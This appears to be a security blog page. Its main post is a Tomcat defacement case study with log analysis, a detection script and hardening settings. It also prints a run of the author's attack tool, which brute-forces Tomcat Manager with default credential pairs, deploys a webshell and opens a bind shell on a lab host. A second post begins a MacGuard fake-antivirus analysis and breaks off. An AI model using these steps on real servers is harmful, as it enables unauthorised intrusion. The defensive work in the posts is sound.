x9090's Blog: Dedicated to computer security, pentesting and vulnerabilities, malware updates and analysis<br />
<h2>
<span style="font-size: x-large;">A Case Study of Tomcat Web Server Defacement</span></h2>
Posted by x9090 on 2012-09-12<br />
<br />
I was asked to investigate a web server believed to have been compromised by an attacker. I knew it was compromised because Symantec had detected some files located in the default Apache Tomcat installation folder:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdhyphenhyphenQdqwb4cbJAzgIDMSo-BDELSwrPZXKMdb2IzC932Rj0IpzMjlWsLFP-_A4BFkiJdiF_XsHnacEnzfR7mP4vJ5h6LaG_MaAzpQ4WP6OX7k9tD8c9jSkh-93rtf2htsJOGSAn6Aaz9-nk/s1600/hacktool_blur.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="219" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdhyphenhyphenQdqwb4cbJAzgIDMSo-BDELSwrPZXKMdb2IzC932Rj0IpzMjlWsLFP-_A4BFkiJdiF_XsHnacEnzfR7mP4vJ5h6LaG_MaAzpQ4WP6OX7k9tD8c9jSkh-93rtf2htsJOGSAn6Aaz9-nk/s320/hacktool_blur.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<u>Figure 1: Symantec detected suspicious HackTool</u></div>
<br />
Unfortunately I couldn't find the quarantined file in the quarantine settings/folder. Symantec's detection name is a generic one, and its description page gives no clue about this file.<br />
<br />
<h2>
<span style="font-size: x-large;">Information Gathering</span></h2>
I decided to try Google search, hoping it would give me some useful hints. Interestingly, a couple of search queries such as "<b><span style="color: yellow;">2.jsp</span></b>" and "<b><span style="color: yellow;">docs\funcspecs</span></b>" turned up nothing. At last I found something interesting with the query "<b><span style="color: yellow;">docs\funcspecs\2.jsp</span></b>", for which Google returned a small number of results:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnPWD_QC-d7VdViqHfZi_mXaelWcfymbMkf3sXPCSUVqVAL3PQfR7CyrcaFSXMqGaJPIvhf-Wg1klAPllIxWrxp2QdUFjTuC8IWEjq8iLrvGFG-35tkooz2GsuHZuBdP7YfuGF0fiwI1O0/s1600/cropped_google_search_2_jsp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnPWD_QC-d7VdViqHfZi_mXaelWcfymbMkf3sXPCSUVqVAL3PQfR7CyrcaFSXMqGaJPIvhf-Wg1klAPllIxWrxp2QdUFjTuC8IWEjq8iLrvGFG-35tkooz2GsuHZuBdP7YfuGF0fiwI1O0/s640/cropped_google_search_2_jsp.png" width="640" /></a></div>
<div style="text-align: center;">
<u>Figure 2: "docs\funcspecs\2.jsp" search result </u></div>
<br />
Simply visiting one of the links leads you to a web page that looks like a file browser. At the bottom of the page we can clearly see the original author's copyright notice: <b><span style="color: magenta;">jsp File Browser version 1.2 by www.vonloesch.de</span></b>. This is an open source JSP file browser, which can be verified by reading the author's official website.<br />
<br />
<h2>
<span style="font-size: x-large;">Understanding the Root Cause</span></h2>
Two questions came to my mind at this point:<br />
<ol>
<li>How was Tomcat compromised, and why was the JSP file browser uploaded to the server under the consistent path "<span style="color: yellow;">docs\funcspecs</span>"?</li>
<li>What vulnerability (if any) could the attacker have used to compromise the website?</li>
</ol>
To understand how the attack was performed, I quickly checked the Tomcat log files and found the following:<br />
<br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">x9090mbp:deploy-undeploy-manager-catalina-log x9090$ grep -i "docs" *</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">catalina.2012-08-29.log:Info: Undeploying context [/docs]</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">catalina.2012-08-29.log:Info: Deploying web application archive docs.war</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">catalina.2012-08-29.log:Info: Deploying web application archive docs.war</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">manager.2012-08-29.log:Info: HTMLManager: undeploy: Undeploying web application at '/docs'</span><br />
<br />
The log shows deploy/undeploy commands, and according to our Java developer he did not deploy or undeploy "<span style="color: yellow;">docs</span>" at all. For those not familiar with Tomcat, "<span style="color: yellow;">docs</span>" is the webapp containing the documentation pages that ships with Apache Tomcat by default.<br />
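Two things in these logs are worth alerting on: deploy/undeploy events for contexts nobody asked for, and the burst of 401s on the Manager that a default-credential brute force (like the one shown later in this post) leaves behind. The script below is an added example, not code from the original post; the catalina/manager and access-log lines are constructed to mirror the format above and an AccessLogValve common pattern, and the allow-list and threshold are assumptions for the demo.

```python
"""Detection helpers for the two signals in this incident's Tomcat logs.

Added example, not code from the original post. Log lines are constructed
to mirror the grep output above and an AccessLogValve with the common
pattern; the allow-list of contexts and the threshold are assumptions.
"""
import re
from collections import Counter

# Contexts that operations is expected to (re)deploy. Assumed for the demo.
KNOWN_CONTEXTS = {"/ROOT", "/myapp"}

# Constructed catalina.log / manager.log lines, modelled on the post's grep output.
SERVER_LOG = """\
Info: Undeploying context [/docs]
Info: Deploying web application archive docs.war
Info: Deploying web application archive myapp.war
Info: HTMLManager: undeploy: Undeploying web application at '/docs'
Info: Deploying web application archive browser.war
"""

# Constructed AccessLogValve lines, pattern "%h %l %u %t \"%r\" %s %b":
# five 401s on the Manager from one client, then a successful PUT deploy.
ACCESS_LOG = """\
172.16.138.1 - - [29/Aug/2012:10:01:01 +0800] "PUT /manager/deploy?path=/browser HTTP/1.1" 401 -
172.16.138.1 - - [29/Aug/2012:10:01:02 +0800] "PUT /manager/deploy?path=/browser HTTP/1.1" 401 -
172.16.138.1 - - [29/Aug/2012:10:01:02 +0800] "PUT /manager/deploy?path=/browser HTTP/1.1" 401 -
172.16.138.1 - - [29/Aug/2012:10:01:03 +0800] "PUT /manager/deploy?path=/browser HTTP/1.1" 401 -
172.16.138.1 - - [29/Aug/2012:10:01:03 +0800] "PUT /manager/deploy?path=/browser HTTP/1.1" 401 -
172.16.138.1 - admin [29/Aug/2012:10:01:04 +0800] "PUT /manager/deploy?path=/browser HTTP/1.1" 200 -
10.0.0.5 - - [29/Aug/2012:10:05:00 +0800] "GET /myapp/index.jsp HTTP/1.1" 200 1234
"""

DEPLOY_RE = re.compile(r"Deploying web application archive (\S+?)\.war")
UNDEPLOY_RE = re.compile(r"Undeploying (?:context \[|web application at ')(/[^\]']*)")
# groups: client ip, remote user, timestamp, method, path, status
ACCESS_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')


def unexpected_deployments(server_log, known=KNOWN_CONTEXTS):
    """Return (action, context) pairs, in log order, for every deploy or
    undeploy of a context that is not on the allow-list."""
    findings = []
    for line in server_log.splitlines():
        m = DEPLOY_RE.search(line)
        if m:
            ctx = "/" + m.group(1)          # docs.war is served at /docs
            if ctx not in known:
                findings.append(("deploy", ctx))
            continue
        m = UNDEPLOY_RE.search(line)
        if m and m.group(1) not in known:
            findings.append(("undeploy", m.group(1)))
    return findings


def manager_auth_failures(access_log, threshold=3):
    """Count 401 responses on /manager per client IP and return the clients at
    or above the threshold: the footprint of a default-credential brute force."""
    counts = Counter()
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if m and m.group(5).startswith("/manager") and m.group(6) == "401":
            counts[m.group(1)] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def manager_deploys_after_failures(access_log, failing_clients):
    """Successful Manager deploy/upload requests from clients that were failing
    authentication: the moment a guessed password turned into a webshell."""
    hits = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, user, ts, method, path, status = m.groups()
        if ip in failing_clients and status == "200" \
                and re.match(r"/manager/(html/upload|deploy)", path):
            hits.append((ip, user, ts, method, path))
    return hits


if __name__ == "__main__":
    for action, ctx in unexpected_deployments(SERVER_LOG):
        print(f"[!] unexpected {action} of {ctx}")
    failing = manager_auth_failures(ACCESS_LOG)
    for ip, n in failing.items():
        print(f"[!] {n} Manager 401s from {ip}")
    for ip, user, ts, method, path in manager_deploys_after_failures(ACCESS_LOG, failing):
        print(f"[!] {ip} deployed as '{user}' at {ts}: {method} {path}")
```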
<br />
Searching the CVE database for Tomcat vulnerabilities, I found one candidate that would allow an attacker to upload files to the Tomcat server. I believe the vulnerability could be related to <a href="http://www.cvedetails.com/cve/CVE-2011-3190/">CVE-2011-3190</a>, based on the following facts:<br />
<ul>
<li>We were running a Tomcat version listed as vulnerable in the CVE</li>
<li>The vulnerability allows remote attackers to bypass authentication and disclose sensitive information on the targeted server.</li>
<li>Last but not least, the complexity of this vulnerability is low :)</li>
</ul>
<div>
Despite the low complexity of this vulnerability, I won't discuss it in detail here; there is a nice write-up on how to exploit it, with source code, at <a href="http://zhh2009.iteye.com/blog/1156191">http://zhh2009.iteye.com/blog/1156191</a>. As a heads-up, the vulnerability is a bug in the AJP protocol handling and is exploitable only if you run the Apache web server as a proxy in front of Tomcat with the mod_jk module. This finding disappointed me, because we do not run the Apache web server.</div>
<br />
I started wondering whether there were alternative methods to upload a file to a Tomcat server. Because I was not really familiar with Tomcat, I spent some time playing around with it in my local environment. I then discovered in the Tomcat documentation that users are able to upload webapps using Tomcat Manager. Tomcat Manager is a web administration panel that allows users to manage or configure the Tomcat server remotely. Its authentication mechanism is HTTP Basic Authentication. Tomcat Manager also supports a series of administrative commands, such as deploying a webapp with an HTTP PUT request.<br />
<br />
Christian Papathanasiou of Trustwave presented at Black Hat Europe 2010 on how to compromise Tomcat without exploiting any Tomcat vulnerability. In his paper he described how an attacker could take control of a Tomcat server using a simple webapp deployer tool. The tool could also brute-force the Tomcat user account, which usually still has the default username and password that most webmasters leave in place.<br />
<br />
<h2>
<span style="font-size: x-large;">TomcatAutoPwn Pentesting Tool</span></h2>
Metasploit ships a module that achieves this goal, <a href="http://www.metasploit.com/modules/exploit/multi/http/tomcat_mgr_deploy">tomcat_mgr_deploy</a>. However, the module requires a username and password as input, so it is not handy for fully automating the process. I therefore decided to write a better tool using a similar approach to tomcat_mgr_deploy. The tool uses the wordlist provided by Metasploit, tomcat_mgr_default_userpass.txt.<br />
<br />
<br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">x9090mbp:PyTomcatAutoPwn x9090$ python PyTomcatAutoPwn.py 172.16.138.131 8080</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">TomcatAutoPwn</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">*******************************</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Connecting to server 172.16.138.131...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Brute forcing 'Basic Authentication'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: j2deployer, password: j2deployer</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: ovwebusr, password: OvW*busr1</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: cxsdk, password: kdsxc</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: root, password: owaspbwa</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: ADMIN, password: ADMIN</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: xampp, password: xampp</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: tomcat, password: s3cret</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] 401 Unauthorized</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Attempting username: admin, password: admintesting</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[-] Failed in deployment</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> [*] FAIL - Application already exists at path /browser</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] TomcatAutoPwn will attempt to redeploy it.</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Undeploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Undeployed successfully</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deploying 'browser.war'...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Deployed successfully</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Check OS version... Passed!</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Server running: Windows XP (5.1) [x86]</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Webshell status enabled!: http://172.16.138.131:8080/browser/browser.jsp</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Which payload you would like to upload to server? (bind/reverse)bind</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Uploading payload to server...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Checking if payload is uploaded successfully? Success</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Bind shell is listening on 172.16.138.131:1234</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">[+] Connecting to target server...</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Microsoft Windows XP [Version 5.1.2600]</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">(C) Copyright 1985-2001 Microsoft Corp.</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0>ipconfig</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">ipconfig</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Windows IP Configuration</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Ethernet adapter Local Area Connection:</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Connection-specific DNS Suffix . : localdomain</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> IP Address. . . . . . . . . . . . : 172.16.138.131</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Subnet Mask . . . . . . . . . . . : 255.255.255.0</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Default Gateway . . . . . . . . . : 172.16.138.2</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Ethernet adapter Bluetooth Network Connection:</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"> Media State . . . . . . . . . . . : Media disconnected</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0>echo %USERPROFILE%</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">echo %USERPROFILE%</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Documents and Settings\LocalService</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0>net config server</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">net config server</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server Name \\USER-851E78F1E7</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server Comment </span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Software version Windows 2002</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server is active on </span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>NetbiosSmb (000000000000)</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>NetBT_Tcpip_{8B05CFDD-E437-4D30-BEC1-399C2B487D52} (000c295a6877)</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Server hidden No</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Maximum Logged On Users 10</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Maximum open files per session 16384</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">Idle session time (min) 15</span><br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">The command completed successfully.</span><br />
<br />
<span style="color: lime; font-family: Courier New, Courier, monospace; font-size: x-small;">C:\Program Files\Apache Software Foundation\Tomcat 6.0></span><br />
<br />
<br />
<h2>
<span style="font-size: x-large;">Securing your Tomcat</span></h2>
Lessons learnt from this incident, and the actions taken to harden Tomcat:
<br />
<div>
<ul>
<li>Rule of thumb: use a non-dictionary username and password</li>
<li>Use LockOutRealm to prevent unlimited invalid login attempts against Tomcat Manager</li>
<li>Web access is not logged by Tomcat by default; configure AccessLogValve to log web traffic</li>
<li>Update to the latest version of Tomcat</li>
</ul>
</div>
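Here is a server.xml and tomcat-users.xml fragment putting the first three points into practice, added as an illustration and not taken from the original post; the account name and password are placeholders, the LockOutRealm values are illustrative, and LockOutRealm itself needs a Tomcat release that ships it (which the last point, updating Tomcat, provides):

```xml
<!-- conf/server.xml (fragment): wrap the existing realm in a LockOutRealm
     and enable request logging on the Host. -->
<Engine name="Catalina" defaultHost="localhost">

  <!-- After failureCount consecutive bad logins the user name is locked for
       lockOutTime seconds, so a default-credential list cannot be walked
       through in one pass. Values are illustrative. -->
  <Realm className="org.apache.catalina.realm.LockOutRealm"
         failureCount="5" lockOutTime="600">
    <Realm className="org.apache.catalina.realm.UserDatabaseRealm"
           resourceName="UserDatabase"/>
  </Realm>

  <Host name="localhost" appBase="webapps">
    <!-- Record client IP, authenticated user, request line and status for
         every request, so Manager deploys and 401 bursts leave a trace. -->
    <Valve className="org.apache.catalina.valves.AccessLogValve"
           directory="logs" prefix="localhost_access_log." suffix=".txt"
           pattern="%h %l %u %t &quot;%r&quot; %s %b"/>
  </Host>
</Engine>

<!-- conf/tomcat-users.xml: no 'tomcat'/'admin' style account name and no
     dictionary password. Both values below are placeholders; generate your
     own. The role name depends on the release: older Tomcat 6 uses the single
     'manager' role, later releases split it into manager-gui/manager-script. -->
<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="svc-deploy-q7x2m" password="REPLACE_WITH_LONG_RANDOM_SECRET"
        roles="manager-gui"/>
</tomcat-users>
```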
<h2>
<span style="font-size: x-large;">References</span></h2>
[1] Abusing JBoss by Christian Papathanasiou<br />
[2] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner by Kingcope<br />
[3] Improving Apache Tomcat Security - A Step By Step Guide - <a href="http://www.mulesoft.com/tomcat-security">http://www.mulesoft.com/tomcat-security</a><br />
<br />
Signing off<br />
@x9090<br />
<h2>
<span style="font-size: x-large;">MacGuard Downloader for MacDefender/MacProtector/MacSecurity</span></h2>
Posted by x9090 on 2011-06-02<br />
<div class="MsoNormal"><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The evolution of MacDefender has gone beyond expectations. This Mac rogue antivirus has evolved rapidly, and the latest variant, MacGuard, does not even require the administrator password during installation. See MacGuard in action in the screenshots below:</span></div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl4LbXVkMgGTO-9YPUVOjy4AeNReG6fuNS783eUeCaunsKEXGS9-hj0_YMGZ8AHwmdI97a2s5lAOIzLS3sfQP-otMxlGVVuBL3Mbf0perZ32elyUdusDeWhTLoc2dq-dFgrK8gzXXZpWy/s1600/MacGuard_first_phase.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVl4LbXVkMgGTO-9YPUVOjy4AeNReG6fuNS783eUeCaunsKEXGS9-hj0_YMGZ8AHwmdI97a2s5lAOIzLS3sfQP-otMxlGVVuBL3Mbf0perZ32elyUdusDeWhTLoc2dq-dFgrK8gzXXZpWy/s320/MacGuard_first_phase.jpg" width="320" /></span></a></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 1: MacGuard is downloading</span></u></div>
<div style="text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDntDZmXBQNdl-_VU-7PG2YWhbCzZKRap1MdwJny982lYn29PymXcyIxXRqw1A3z3vSLI-xWnIN4iJhp286ovvqfYsv7SguJAIjcPET9SsarVAFV6UywAAKziL-M6XBbFT8b2_TmJfVwJ/s1600/MacGuard_second_phase.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyDntDZmXBQNdl-_VU-7PG2YWhbCzZKRap1MdwJny982lYn29PymXcyIxXRqw1A3z3vSLI-xWnIN4iJhp286ovvqfYsv7SguJAIjcPET9SsarVAFV6UywAAKziL-M6XBbFT8b2_TmJfVwJ/s320/MacGuard_second_phase.jpg" width="320" /></span></a></div></div><div style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 2: MacGuard installation</span></u></div>
<div style="text-align: left;"><u><b><i><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Analysis of MacGuard Downloader</span></i></b></u></div>
<ol><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Identifying malicious URL</span></b></li>
</ol><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">When <b style="mso-bidi-font-weight: normal;">avRunner</b> is executing, the <b style="mso-bidi-font-weight: normal;">__DownloadWinCtrl_startDownloadingURL__</b> handler is invoked to start the download routine. The downloader first obtains the following variables:</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<ul><li><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The name of the fake AV archive installer to be downloaded</span></li>
<li><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The remote server hosting the fake AV archive installer</span></li>
<li><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">The affiliate ID used by the server-side script</span></li>
</ul></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">These variables are obtained through <b style="mso-bidi-font-weight: normal;">__ZL14getConfigParami</b>.</span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Once the variables are obtained, the complete URL of the remote server hosting the fake AV archive installer is formed. The URL format is:</span><br />
<div style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><b style="mso-bidi-font-weight: normal;">http://[remote_server_ip]/mac/soft.php?affid=[id]</b></span></div></div><div align="center" class="MsoNormal" style="text-align: center;">
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTu7H_3flP3vlJLUmUWeEx_ByRvmaXAmqvbkoxahTj211S9KqP4ZM3Y5bbSx1VfERiluNiWdpqXQ8wCy5J_vcHB1I_F3vaTsYUMoym26bQSM30-Rr3QtnI9XeP_k4T_ySUW1nmYLKB0pZk/s1600/Figure3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTu7H_3flP3vlJLUmUWeEx_ByRvmaXAmqvbkoxahTj211S9KqP4ZM3Y5bbSx1VfERiluNiWdpqXQ8wCy5J_vcHB1I_F3vaTsYUMoym26bQSM30-Rr3QtnI9XeP_k4T_ySUW1nmYLKB0pZk/s640/Figure3.png" width="640" /></span></a></div><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 3: Start Downloading Mac Fake AV Installer</span></u></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<ol start="2"><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Identifying where the downloaded component will be stored</span></b></li>
</ol><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">If the URL is valid and the Objective-C <b style="mso-bidi-font-weight: normal;">NSURLDownload</b> returns a valid object, it goes on to call the local function <b style="mso-bidi-font-weight: normal;">__ZL21getDownloadedFilePathv</b> to get the local directory in which to store the downloaded file.</span></div><div class="MsoNormal"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9atJX_Wnz0L7J8c8LIoqAmCNm4pDOHZRMbDyddVXODXWKHixA54yc77cqMCPQEaQ53pyHZUhgtY-ro2tDRp-ViA2GEOdzL4yI2pgdJozkR6LGLhyphenhyphenIfbiLfDsx-k91qYO2iTyyYHcmL4QG/s1600/Figure4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9atJX_Wnz0L7J8c8LIoqAmCNm4pDOHZRMbDyddVXODXWKHixA54yc77cqMCPQEaQ53pyHZUhgtY-ro2tDRp-ViA2GEOdzL4yI2pgdJozkR6LGLhyphenhyphenIfbiLfDsx-k91qYO2iTyyYHcmL4QG/s1600/Figure4.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 4: Save the Downloaded File to Local Drive</span></u></div><div class="MsoNormal"><span class="Apple-style-span" 